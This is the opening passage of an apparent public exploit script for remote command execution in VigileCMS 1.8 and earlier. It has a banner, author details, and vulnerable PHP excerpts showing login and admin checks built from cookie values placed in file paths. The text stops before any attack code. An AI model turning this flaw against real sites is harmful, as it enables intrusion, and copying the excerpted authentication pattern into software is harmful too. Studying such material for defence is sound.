|
#!/usr/bin/python=0D
#-*- coding: iso-8859-15 -*-=0D
'''=0D
------------------------------------------------------------------------------------------------=0D
____ __________ __ ____ __ =0D
/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ =0D
| |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\=0D
| | | \ | |/ \ \___| | /_____/ | || | =0D
|___|___| /\__| /______ /\___ >__| |___||__| =0D
\/\______| \/ \/ =0D
=0D
------------------------------------------------------------------------------------------------=0D
This is a Public Exploit. 22/11/2007 (dd-mm-yyyy)=0D
------------------------------------------------------------------------------------------------=0D
=A7 0day VigileCMS <= 1.8 Stealth - Remote Command Execution =A7=0D
Vendor: http://www.vigilenapoletano.it=0D
Severity: Highest=0D
Author: The:Paradox=0D
Italy r0x.=0D
=0D
Visit inj3ct-it.org=0D
=0D
Comments: This exploit was coded to show some people what a real vulnerability is. =0D
------------------------------------------------------------------------------------------------=0D
Related Codes:=0D
=0D
--- index.php; line 64:=0D
=0D
if (isset($_COOKIE[rem_user]) and isset ($_COOKIE[rem_pass]) and !isset($_SESSION[user])) {=0D
if(file_exists(USERS_TAB."/$_COOKIE[rem_user].$_COOKIE[rem_pass].php")){=0D
$_SESSION[user] = $_COOKIE[rem_user];=0D
$_SESSION[pass] = $_COOKIE[rem_pass];=0D
logthis("$_SESSION[user] si =E8 collegato al Sito: riconosciuto con Cookie!");=0D
UserVisita ();// aggiornamento database utente per numero di visite=0D
}=0D
}=0D
=0D
--- func.inc.php; line 93:=0D
=0D
function is_admin(){ //## FUNCTION ##=0D
if( (isset($_SESSION[user]) and isset($_SESSION[pass])) && (file_exists(ADMIN_TAB."/$_SESSION[user].$_SESSION[pass].php")) ){=0D
return true;=0D
} else {=0D
return false;=0D
}=0D
}=0D
=0D
--- func.inc.php; line 109:=0D
=0D
function is_superadmin(){ //## FUNCTION ##=0D
include (LOGS_TAB."/creazione.php");=0D
if (isset($_SESSION["user"]) and isset($_SESSION["pass"]) and ($_SESSION[user]==$primo_amministra)) {=0D
return true;=0D
} else {=0D
return false;=0D
}=0D
}=0D
=0D
--- vedipm.php; line 210:=0D
=0D
if ($_POST[ttl] =="") $_POST[ttl]="Nessun oggetto";=0D
=0D
=0D
=0D
$_POST[ttl] =stripslashes($_POST[ttl]);=0D
=0D
$_POST[ttl] =htmlspecialchars($_POST[ttl]); // impedisce visualizzazioni caratteri html e